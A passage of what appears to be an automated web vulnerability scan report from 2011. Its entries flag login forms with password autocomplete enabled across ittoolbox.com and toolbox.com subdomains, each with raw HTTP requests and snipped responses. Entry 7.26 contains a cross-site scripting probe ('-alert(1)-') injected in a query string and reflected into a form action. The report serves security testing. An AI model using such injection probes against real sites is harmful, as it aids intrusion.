</div>
<form name="aspnetForm" method="post" action="/research/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$m$txtSignin_Password" type="password" id="ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.10. http://cio.ittoolbox.com/subscriptions/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cio.ittoolbox.com
Path:   /subscriptions/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /subscriptions/ HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 27989
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=vzkaha55kglahd45pvrgqp2s; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   IT Manageme
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/subscriptions/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.11. http://cloud.ittoolbox.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cloud.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: cloud.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 56007
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=edr0xeykfwnzlf55wgzg3zyo; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Toolbox for
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.12. http://crm.ittoolbox.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://crm.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: crm.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 82725
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=2ge150zsf5orj4451zm2nlzm; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   CRM Communi
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.13. http://database.ittoolbox.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://database.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: database.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 84329
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ra1d4q2rs54sn03stt4bip55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Database Co
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.14. http://datacenter.ittoolbox.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://datacenter.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: datacenter.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 60090
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wgr3vvq5eg30jq45klsivcfv; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Toolbox for
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.15. http://datawarehouse.ittoolbox.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://datawarehouse.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: datawarehouse.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 72791
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ivrlt045uzzhvb45t5knzy55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Data Wareho
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.16. http://eai.ittoolbox.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://eai.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: eai.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 71618
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=4d5wgz45zmrk1tj0f23ykr55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   EAI Communi
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.17. http://emergingtech.ittoolbox.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://emergingtech.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: emergingtech.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 47575
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=vhyrxg55jlanffvxx24ekzek; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Emerging Te
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.18. http://erp.ittoolbox.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://erp.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: erp.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 74629
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=11lky4ffifxs05zpvlu4qv55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   ERP Communi
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.19. http://finance.toolbox.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://finance.toolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: finance.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 81717
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Finance Com
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.20. http://hardware.ittoolbox.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://hardware.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: hardware.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 78653
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=3wjpn4yajv3hcfa0fidd3prk; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Hardware Co
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.21. http://hr.toolbox.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://hr.toolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: hr.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:55:29 GMT
X-Varnish: 485228978 485227493
Age: 1729
Via: 1.1 varnish
Connection: close
X-Cache: HIT
X-Cache-Hits: 22
Cache-Control: private
Content-Length: 81247


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   HR Communit
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.22. http://infor.ittoolbox.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://infor.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: infor.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 54154
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=laxlg3yxtwdispubbh1xwd45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Infor Commu
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.23. http://it.toolbox.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 90471
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   IT Communit
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.24. http://it.toolbox.com/ask-a-question  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /ask-a-question

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /ask-a-question HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 47932
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:48:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Ask a Quest
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/ask-a-question" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.25. http://it.toolbox.com/blogs/it-blogs  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/it-blogs

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blogs/it-blogs HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 76343
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Toolbox for
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/it-blogs" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.26. http://it.toolbox.com/blogs/ppmtoday  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blogs/ppmtoday?306f2'-alert(1)-'2382eb5920b=1 HTTP/1.1
Host: it.toolbox.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:43:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday?306f2'-alert(1)-'2382eb5920b=1" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.27. http://it.toolbox.com/blogs/ppmtoday  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blogs/ppmtoday HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63634
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.28. http://it.toolbox.com/blogs/ppmtoday/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blogs/ppmtoday/ HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63636
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.29. http://it.toolbox.com/blogs/ppmtoday/change-origins-39674  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/change-origins-39674

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blogs/ppmtoday/change-origins-39674 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68764
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:36 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Change Orig
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/change-origins-39674" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.30. http://it.toolbox.com/blogs/ppmtoday/does-john-stewart-run-a-cmm-level-5-shop-42066  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/does-john-stewart-run-a-cmm-level-5-shop-42066

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blogs/ppmtoday/does-john-stewart-run-a-cmm-level-5-shop-42066 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
